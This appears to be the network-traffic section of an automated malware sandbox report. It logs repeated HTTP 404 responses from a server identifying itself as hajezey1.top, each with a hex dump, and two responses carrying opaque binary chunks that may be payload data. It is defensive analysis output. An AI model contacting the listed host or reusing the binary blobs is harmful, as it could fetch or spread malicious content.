25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 